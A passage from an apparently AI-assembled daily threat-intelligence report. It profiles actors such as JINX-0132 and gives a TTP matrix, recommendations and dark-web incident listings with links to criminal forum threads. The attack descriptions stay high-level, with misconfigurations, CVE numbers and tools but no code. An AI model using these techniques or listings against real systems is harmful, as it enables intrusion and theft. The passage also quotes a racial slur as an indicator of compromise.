Aura offers a comprehensive, all-in-one digital security solution that integrates financial, identity, network, and device protection.50 Their antivirus product is designed to secure devices from various types of malware, including viruses, spyware, trojans, ransomware, worms, and rootkits.51 It provides real-time scanning for new files and uses AI-powered Safe Browsing to block dangerous sites that may attempt to steal personal and financial information or deliver malware.51 Beyond malware protection, Aura’s services include identity theft protection with credit monitoring, online data removal, a Virtual Private Network (VPN) for secure browsing, a password manager, and parental controls.52 This suite of services aims to provide peace of mind by safeguarding individuals and families against a wide range of online threats.50

Further Reading:

Threat Actor: JINX-0132 (Associated with “Wisetony” context)

The term “Wisetony” does not refer to a specific threat actor in the provided research. Instead, the relevant information details the activities of “JINX-0132.”

Threat Actor: JINX-0132

JINX-0132 is a threat actor primarily engaged in cryptojacking campaigns.53 This actor is notable for what is believed to be the first publicly documented instance of Nomad misconfigurations being exploited as an attack vector in the wild.53 They have also previously targeted exposed SeleniumGrid deployments in a campaign dubbed “SeleniumGreed”.53 Their general modus operandi involves exploiting misconfigurations in common cloud and DevOps tools to achieve remote code execution and deploy cryptominers.53 A distinctive behavioral indicator is their preference for using offensive slurs, such as “NIGNOG,” when naming defined task groups in their malicious jobs.53 The primary motivation for JINX-0132’s activities is financial gain through cryptojacking.53

The tactics, techniques, and procedures (TTPs) employed by JINX-0132 include:

  • Exploitation of Misconfigurations: They abuse publicly exposed Nomad server APIs that are running without recommended security configurations. This allows them to create multiple new jobs on compromised hosts, each assigned a seemingly random name but with a consistent, offensive task group name.53
  • Vulnerability Exploitation: JINX-0132 exploits Gitea instances vulnerable to Remote Code Execution (RCE), particularly if git hooks are enabled, the installation page is left unlocked, or if specific older versions (like 1.4.0) are in use.53
  • Consul Misconfiguration Abuse: They also exploit misconfigurations in Consul, such as enable-script-checks being set to true or the HTTP API not being restricted to localhost, to execute malicious payloads.53
  • Payload Deployment: The primary payload observed is XMRig, a Monero cryptocurrency miner.53

Indicators of Compromise (IOCs) associated with JINX-0132’s activity include a specific XMRig hash, a Monero wallet address, and the distinctive “NIGNOG” Nomad Task Group definition name.53 Their targeting profile focuses on organizations with misconfigured cloud and DevOps environments, specifically exposed instances of Nomad, Gitea, and Consul.53 This reliance on exploiting misconfigurations, rather than complex zero-day vulnerabilities, highlights a critical attack vector that often goes unnoticed by traditional security measures, emphasizing the need for robust secure configuration management in modern IT environments.

Further Reading:

Threat Actor: (Clarification for “Wearerootsec”)

The term “Wearerootsec” does not refer to a specific threat actor in the provided research. The associated snippet lists several other hacker groups, offering a general overview of the diverse landscape of cyber adversaries.55

The landscape of hacker groups is vast and varied, encompassing entities with distinct motivations and capabilities. These include:

  • The Shadow Brokers (TSB): Known for leaking hacking tools, including zero-day exploits, allegedly from the National Security Agency (NSA).55
  • ShinyHunters: A group responsible for numerous data breaches, often selling stolen data on dark web marketplaces.55
  • SiegedSec: A hacktivist group with anti-government and LGBTQ+-supportive stances, frequently targeting U.S. government agencies and law enforcement.55
  • TeaMp0isoN: A black-hat computer hacking group.55
  • UGNazi: A hacking group known for attacks on U.S. government sites, DDoS attacks, and exposing personal information of celebrities.55
  • Vice Society: A Russian-speaking hacker group that targets healthcare and education organizations with ransomware.55
  • Wizard Spider: A Russian/Ukrainian group suspected of being behind significant ransomware attacks, often associated with the Trickbot malware.55

This variety underscores the fragmented yet interconnected nature of the cyber threat environment, where different groups specialize in different types of attacks and target various sectors based on their objectives.

Further Reading:

Threat Actor: (Clarification for “Cargo threat actor”)

The term “Cargo threat actor” does not refer to a specific named group but rather describes a type of threat activity targeting the logistics and transportation sector. This activity often involves a convergence of cyber tactics and physical crime, indicating that various unnamed actors, or even state-sponsored groups with dual objectives, may be involved.

The motivation behind these activities can be dual-faceted: direct financial gain through cargo theft and fraud, and cyber espionage, such as monitoring aid shipments or gathering intelligence.2 This overlap suggests that the same TTPs might be leveraged by different types of actors, blurring the lines between purely financially motivated and state-sponsored operations.

The tactics, techniques, and procedures (TTPs) employed in these attacks are sophisticated:

  • Cyber-Facilitated Theft: Adversaries leverage cyber tactics to impersonate legitimate carriers, reroute deliveries, and execute “fictitious pickups,” where fake trucks, complete with correct branding, arrive to collect and disappear with high-value goods.2 This involves infiltrating logistics systems and monitoring delivery schedules.2
  • Initial Access: Common initial access vectors include credential guessing or brute force attacks (T1110.001, T1110.003), and spearphishing campaigns designed to steal credentials or deliver malware (T1566).3 Actors also abuse vulnerabilities in small office/home office (SOHO) devices to facilitate covert cyber operations and proxy malicious activity.3 Exploitation of Roundcube CVEs (CVE-2020-12641, CVE-2020-35730, CVE-2021-44026) has been observed to execute arbitrary shell commands, gain access to victim email accounts, and retrieve sensitive data from email servers (T1059, T1114).3
  • Lateral Movement: Native commands and open-source tools like Impacket and PsExec (TA0008) are used to move laterally within compromised environments.3

The logistics and final-mile delivery sectors are particularly vulnerable due to minimal cyber protection, fragmented systems, and the rapid expansion of digital platforms like load boards and freight-matching apps.2 This creates systemic risks where digital compromises directly translate into tangible physical losses.2 The CISA advisory linking these attacks to broader cyber espionage campaigns, such as IP camera targeting in Ukraine and bordering NATO nations, further underscores the strategic importance of this sector to various threat actors.3 This convergence of cyber and physical crime necessitates a more integrated risk management approach for businesses in these industries.

Further Reading:

Table 2: Threat Actor TTP Matrix (Illustrative Sample)

This matrix provides a comparative overview of selected threat actors’ common tactics, techniques, and procedures, aiding in understanding their operational playbooks.

Threat ActorPrimary MotivationInitial Access VectorsExecution & PersistenceDefense EvasionImpact & MonetizationTarget Sectors
PhorpiexFinancialInfected USB drives, phishing (IM, email), malicious downloads, worm modules 4Malware delivery (ransomware, cryptominers, infostealers), spambots 4Operates without active C2 (implied resilience) 5Extortion (sextortion), cryptojacking, selling access to systems, ransomware, spam emails 4Finance sector (Europe, North America) 5
PryxFinancialMalware/ransomware development, identity access brokering 6Novel info-stealing malware, Hellcat ransomware 6Not explicitly detailed, focus on development 6Ransomware (Hellcat), selling access/malware 6Unspecified (Hellcat victims) 6
Velvet AntEspionageLegacy F5 BIG-IP persistence 8PlugX RAT (DLL side-loading), Impacket for lateral movement 8Internal C&C via F5 BIG-IP, disabling EDR, dual PlugX versions (covert C2) 8Sensitive information collection (customer, financial) 8East Asian organizations 8
Team Insane PKIdeologicalNot explicitly detailed, likely public-facing vulnerabilitiesDDoS attacks, data leaks 27Use of check-host.net for proof (public validation) 28Service disruption (DDoS), public shaming (data leaks), spreading religious messages 27Indian/Iranian government, banking, finance, education, telecom, manufacturing, national archives 27
JINX-0132FinancialMisconfigured Nomad API, Gitea RCE, Consul misconfigurations 53XMRig cryptominer deployment 53Obfuscation via offensive task group names 53Cryptojacking (Monero mining) 53Organizations with misconfigured cloud/DevOps environments (Nomad, Gitea, Consul) 53
RansomHubFinancialKnown vulnerabilities (Zerologon), spear-phishing 48WMI, PowerShell, PsExec, RDP, SMB, SSH, Impacket, remote management tools 48Masquerading, log deletion, disabling security tools 48Data encryption, data exfiltration (financial, client, IP), pressure tactics 48Aerospace, defense, energy, healthcare, government, law enforcement, telecom, pharma, manufacturing 48
UNC3944FinancialSMS phishing for credentials 1Hive/DragonForce ransomware deployment 1Abusing legitimate Microsoft-signed drivers (Poortry, Stonestop), attestation signing 1Ransomware, SIM swapping services 1Telecom, BPO, MSSP, financial services, entertainment, medical 1
Cargo TA (Generic)Financial/EspionageCredential guessing/brute force, spearphishing, SOHO device vulns, Roundcube CVEs 3Impacket, PsExec for lateral movement 3Proxy malicious activity via SOHO devices 3Cyber-facilitated cargo theft (fictitious pickups), rerouted payments, espionage (monitoring aid shipments) 2Logistics, transportation hubs, maritime, air traffic management, IT services, IP cameras 2

(Note: This table contains a representative sample of threat actors and their TTPs based on the provided research. It is illustrative and would be dynamically populated and expanded with real-time data in a live report.)

IV. Conclusions and Recommendations

The daily analysis of cyber incidents underscores several critical observations for organizations seeking to enhance their security posture.

First, the evolving sophistication of financially motivated cybercrime is undeniable. The adoption of advanced evasion techniques, such as abusing legitimate Microsoft-signed drivers by groups like UNC3944 1 and exploiting zero-day vulnerabilities in common software by EncryptHub 42, demonstrates that high-end capabilities are no longer exclusive to state-sponsored actors. This means that defense strategies must be robust and comprehensive across the board, assuming that any adversary, regardless of their primary objective, may possess or acquire advanced tools and methods. Organizations should invest in advanced endpoint detection and response (EDR) solutions capable of identifying anomalous behavior even from trusted binaries, and rigorously monitor the use of legitimate system tools for malicious purposes.

Second, the rise of “as-a-Service” models, exemplified by RansomHub’s RaaS and World Leaks’ EaaS platforms 32, coupled with inter-group collaborations, signifies a highly specialized and interconnected cybercrime ecosystem. This modularity in attack operations means that a compromise might be initiated by one actor, for instance, a botnet operator providing initial access, and then leveraged by another for encryption or extortion. This necessitates a holistic view of the attack kill chain, moving beyond isolated threat intelligence to understand how different components of the cybercrime supply chain interact. Organizations should prioritize intelligence sharing and collaborative defense frameworks to counter these networked threats.

Third, the shift in extortion tactics, particularly World Leaks’ move towards “extortion-only” operations 32, indicates that increased law enforcement pressure and improved defenses are making direct ransomware deployment riskier for some groups. However, the continued occurrence of ransomware in some of World Leaks’ operations 32 highlights that this shift is not absolute. Data exfiltration for extortion will remain a primary threat, and the psychological pressure tactics employed by these groups (e.g., countdown timers, direct chats, selective data exposure) are potent. Comprehensive incident response plans must therefore address not only technical remediation but also robust communication strategies and reputational risk management.

Fourth, the exploitation of misconfigurations in cloud and DevOps tools, as demonstrated by JINX-0132 53, represents a growing and critical attack vector. These vulnerabilities often go unnoticed compared to traditional software flaws. Beyond routine vulnerability patching, organizations must prioritize secure configuration management, especially for cloud-native applications and development environments. Implementing strict security baselines, regularly auditing configurations, and ensuring that default settings are hardened are essential steps to close these increasingly targeted gaps.

Finally, the observed tendency of some threat actors, such as Handala Hack, to exaggerate or fictionalize their claims 37 underscores the importance of critical evaluation in threat intelligence consumption. These “perception hacking” operations aim to influence public opinion and incite fear, making the narrative of an attack as impactful as the technical breach itself. Organizations must verify claims through multiple, trusted sources and understand that public pronouncements by adversaries may serve strategic information warfare objectives rather than purely factual reporting of technical success. This requires a discerning approach to incoming threat intelligence and a focus on verifiable indicators of compromise and TTPs.

In conclusion, the cyber threat landscape is continuously adapting. Organizations must move beyond static defenses to embrace dynamic, intelligence-driven security postures that account for the evolving motivations, capabilities, and interconnectedness of threat actors. Prioritizing fundamental cyber hygiene, investing in advanced detection capabilities, and integrating proactive threat intelligence into operational workflows are paramount to building resilience against these persistent and sophisticated threats.

V. Comprehensive Incident Details

This section provides a comprehensive list of all cybersecurity incidents reported within the last 24 hours, including all relevant details and links.

Incident: Alleged sale of UAE Private Business Database

Incident: Alleged database sale of Skillbee

Incident: Alleged sale of Zoom Private SI Kit Loader

  • Category: Malware
  • Content: The threat actor is selling a Zoom Private SI Kit loader, designed for social engineering operations. The kit includes a spoofed Zoom page and a manual containing commands and instructions to deliver payloads from a remote server directly to a target machine. The method is customizable based on operational needs.
  • Date: 2025-07-08T13:03:52Z
  • Network: openweb
  • Published URL: https://ramp4u.io/threads/zoom-private-si-kit-loader.3261/
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/7afeea0b-1123-41f6-af0c-c33684b64f7c.png
  • Threat Actor(s): anongod
  • Title: Alleged sale of Zoom Private SI Kit Loader
  • Victim Country:
  • Victim Industry:
  • Victim Organization:
  • Victim Site:

Incident: Alleged data breach of Helwan University

Incident: Alleged Sale of EDRs and USA Government Data

  • Category: Initial Access
  • Content: Threat actor claims to be selling EDR access and U.S. government data packages, along with regular government records from countries such as Argentina, Brazil, and Zambia. The offering also includes premium bundles featuring social media subpoenas, forged documents, and high-value subpoenas for platforms like Instagram, Facebook, Telegram, and Gmail.
  • Date: 2025-07-08T12:05:54Z
  • Network: openweb
  • Published URL: https://kittyforums.to/thread/575
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/106a87b9-61c5-4caf-91f2-cb0c905c40d2.png
  • Threat Actor(s): caeer
  • Title: Alleged Sale of EDRs and USA Government Data
  • Victim Country:
  • Victim Industry:
  • Victim Organization:
  • Victim Site:

Incident: Alleged access to Saudi Ministry of Justice

Works cited

  1. Threat actors abuse legitimate Microsoft drivers to bypass security | Cybersecurity Dive, accessed July 8, 2025, https://www.cybersecuritydive.com/news/threat-actors-microsoft-bypass-security/638698/
  2. Cybercrime in Supply Chains: Cargo Theft, Fraud & Insurance Gaps – Risk Strategies, accessed July 8, 2025, https://www.risk-strategies.com/blog/cybercrime-in-supply-chains-cargo-theft-fraud-insurance-gaps
  3. Russian GRU Targeting Western Logistics Entities and Technology Companies – CISA, accessed July 8, 2025, https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a
  4. Phorpiex Malware – Check Point Software, accessed July 8, 2025, https://www.checkpoint.com/cyber-hub/threat-prevention/what-is-malware/phorpiex-malware/
  5. Phorpiex malware campaign targets finance sector in Europe and North America, accessed July 8, 2025, https://www.broadcom.com/support/security-center/protection-bulletin/phorpiex-malware-campaign-targets-finance-sector-in-europe-and-north-america
  6. Threat Actor Spotlight: Pryx – Morado Intelligence, accessed July 8, 2025, https://www.morado.io/blog-posts/threat-actor-spotlight-pryx
  7. All Threat Actors, APTs and known groups | BreachHQ by Beyond Identity, accessed July 8, 2025, https://breach-hq.com/threat-actors
  8. China-Linked Hackers Infiltrate East Asian Firm for 3 Years Using F5 Devices, accessed July 8, 2025, https://thehackernews.com/2024/06/china-linked-hackers-infiltrate-east.html
  9. The Underground Economist: Volume 5, Issue 1 – ZeroFox, accessed July 8, 2025, https://www.zerofox.com/intelligence/the-underground-economist-volume-5-issue-1/
  10. Bl00dy Ransomware | WatchGuard Technologies, accessed July 8, 2025, https://www.watchguard.com/br/wgrd-ransomware/bl00dy
  11. The Underground Economist: Volume 5, Issue 11 – ZeroFox, accessed July 8, 2025, https://www.zerofox.com/intelligence/the-underground-economist-volume-5-issue-11/
  12. Decoding The Naming Game: Why Standardizing Threat Actor Names Alone Won’t Enhance Your Security Posture Or Response – Forrester, accessed July 8, 2025, https://www.forrester.com/blogs/decoding-the-naming-game-why-standardizing-threat-actor-names-alone-wont-enhance-your-security-posture-or-response/
  13. Anonymous (hacker group) – Wikipedia, accessed July 8, 2025, https://en.wikipedia.org/wiki/Anonymous_(hacker_group)
  14. Nobelium SolarWinds Hacker – Threatcop, accessed July 8, 2025, https://threatcop.com/blog/nobelium-solarwind-hackers/
  15. About Us – Career Hackers, accessed July 8, 2025, https://careerhackers.io/pro/about-us
  16. The Job Hackers – Changing the Way People Connect With Their Lives and Careers, accessed July 8, 2025, https://www.thejobhackers.org/
  17. What is a Cyber Threat Actor? | CrowdStrike, accessed July 8, 2025, https://www.crowdstrike.com/en-us/cybersecurity-101/threat-intelligence/threat-actor/
  18. What Is a Threat Actor? – Definition, Types & More | Proofpoint US, accessed July 8, 2025, https://www.proofpoint.com/us/threat-reference/threat-actor
  19. Trojan:Win32/Ekstak threat description – Microsoft Security Intelligence, accessed July 8, 2025, https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Ekstak&ThreatID=2147735572
  20. Revealing Corporate Vulnerabilities: Understanding How Threat Actors Breach and Exploit Your Data | KELA Cyber, accessed July 8, 2025, https://www.kelacyber.com/blog/revealing-corporate-vulnerabilities-understanding-how-threat-actors-breach-and-exploit-your-data/
  21. Equation Group – Wikipedia, accessed July 8, 2025, https://en.wikipedia.org/wiki/Equation_Group
  22. Ghost Squad Hackers – Wikipedia, accessed July 8, 2025, https://en.wikipedia.org/wiki/Ghost_Squad_Hackers
  23. Mr. Robot – Wikipedia, accessed July 8, 2025, https://en.wikipedia.org/wiki/Mr._Robot
  24. Threat actor – Wikipedia, accessed July 8, 2025, https://en.wikipedia.org/wiki/Threat_actor
  25. Mandiant links DragonForce ransomware attacks on UK retailers to UNC3944 tactics, highlighting links to RansomHub – Industrial Cyber, accessed July 8, 2025, https://industrialcyber.co/ransomware/mandiant-links-dragonforce-ransomware-attacks-on-uk-retailers-to-unc3944-tactics-highlighting-links-to-ransomhub/
  26. Orange Group investigates cyberattack as hacker releases compromised data, accessed July 8, 2025, https://www.techmonitor.ai/technology/cybersecurity/orange-group-investigates-cyberattack-hacker-compromised-data
  27. Team Insane PK: The Religious Hacktivist | Radware, accessed July 8, 2025, https://www.radware.com/cyberpedia/ddos-attacks/hacktivist-group-team-insane-pk/
  28. Team Insane PK claims DDoS Attack on 44 Indian Banking and …, accessed July 8, 2025, https://www.cloudsek.com/threatintelligence/team-insane-pk-claims-ddos-attack-on-44-indian-banking-and-finance-websites
  29. Threat actors: Who they are and how Google protects you – YouTube, accessed July 8, 2025, https://www.youtube.com/watch?v=UgP0RaPzo0I
  30. 13 Most Famous Hacker Groups in History – Webopedia, accessed July 8, 2025, https://www.webopedia.com/technology/famous-hacker-groups/
  31. Top 10 Most Famous Hacker Groups and Their Deeds – Mysterium VPN, accessed July 8, 2025, https://www.mysteriumvpn.com/blog/famous-hacker-groups
  32. World Leaks: An Extortion Platform – Lexfo’s security blog, accessed July 8, 2025, https://blog.lexfo.fr/world-leaks-an-extortion-platform.html
  33. Surmodics & Kentfield Hospital Fall Victim to Cyberattacks – The HIPAA Journal, accessed July 8, 2025, https://www.hipaajournal.com/surmodics-kentfield-hospital-cyberattacks/
  34. Digital Ghost | Profile – HackerOne, accessed July 8, 2025, https://hackerone.com/digital_ghost
  35. Ghost Squad Hackers–Modem Mischief – Apple Podcasts, accessed July 8, 2025, https://podcasts.apple.com/cz/podcast/ghost-squad-hackers/id1585249019?i=1000636587679
  36. Iranian hacker group targets Israeli kindergartens’ PA systems | Iran …, accessed July 8, 2025, https://www.iranintl.com/en/202501265679
  37. Iran Conducts Cyberattacks to Terrorize Israelis – FDD, accessed July 8, 2025, https://www.fdd.org/analysis/policy_briefs/2025/02/03/iran-conducts-cyberattacks-to-terrorize-israelis/
  38. Adversarial Misuse of Generative AI | Google Cloud Blog, accessed July 8, 2025, https://cloud.google.com/blog/topics/threat-intelligence/adversarial-misuse-generative-ai
  39. Russian hackers targeting German politicians — report – DW – 03/22/2024, accessed July 8, 2025, https://www.dw.com/en/russian-hackers-targeting-german-politicians-report/a-68648816
  40. Threat Actors Target U.S. Critical Infrastructure with LummaC2 Malware | CISA, accessed July 8, 2025, https://www.cisa.gov/news-events/alerts/2025/05/21/threat-actors-target-us-critical-infrastructure-lummac2-malware
  41. What is a Threat Actor? Types & Examples – SentinelOne, accessed July 8, 2025, https://www.sentinelone.com/cybersecurity-101/threat-intelligence/threat-actor/
  42. Russian threat actor weaponized Microsoft Management Console flaw | Cybersecurity Dive, accessed July 8, 2025, https://www.cybersecuritydive.com/news/russian-threat-actor-weaponizing-microsoft-management-console-zero-day/743558/
  43. Threat Actor – MISP galaxy, accessed July 8, 2025, https://misp-galaxy.org/threat-actor/
  44. Markus Hess – Wikipedia, accessed July 8, 2025, https://en.wikipedia.org/wiki/Markus_Hess
  45. Guess Confirms Ransomware Attack and Data Breach – Bank Info Security, accessed July 8, 2025, https://www.bankinfosecurity.com/guess-confirms-ransomware-attack-data-breach-a-17058
  46. BreachRx – Incident Management Software, accessed July 8, 2025, https://www.breachrx.com/
  47. The Zero Day Intelligence Revolution: Why Reactive Cybersecurity is Dead – Medium, accessed July 8, 2025, https://medium.com/@pi._.ku/the-zero-day-intelligence-revolution-why-reactive-cybersecurity-is-dead-dde49a5df485
  48. Threat Actor Profile: RansomHub Ransomware Group – Cyble, accessed July 8, 2025, https://cyble.com/threat-actor-profiles/ransomhub-ransomware-group/
  49. Ransomware Rebounds: Extortion Threat Surges in 2023, Attackers Rely on Publicly Available and Legitimate Tools – Google Cloud, accessed July 8, 2025, https://cloud.google.com/blog/topics/threat-intelligence/ransomware-attacks-surge-rely-on-public-legitimate-tools
  50. Company Overview Aura Fast Facts The Industry Today, accessed July 8, 2025, https://filecache.mediaroom.com/mr5mr_intrusta/177482/aura%20%281%29.pdf
  51. Antivirus & Anti-malware Software | Reliable Virus Scanner – Aura, accessed July 8, 2025, https://www.aura.com/antivirus
  52. Aura | Intelligent Digital Safety for the Whole Family, accessed July 8, 2025, https://www.aura.com/
  53. DevOps Tools Targeted for Cryptojacking | Wiz Blog, accessed July 8, 2025, https://www.wiz.io/blog/jinx-0132-cryptojacking-campaign
  54. How Threat Actor Profiling Can Help Prevent Ransomware Attacks – YouTube, accessed July 8, 2025, https://www.youtube.com/watch?v=2Ucp64KpNi4
  55. List of hacker groups – Wikipedia, accessed July 8, 2025, https://en.wikipedia.org/wiki/List_of_hacker_groups

Related Posts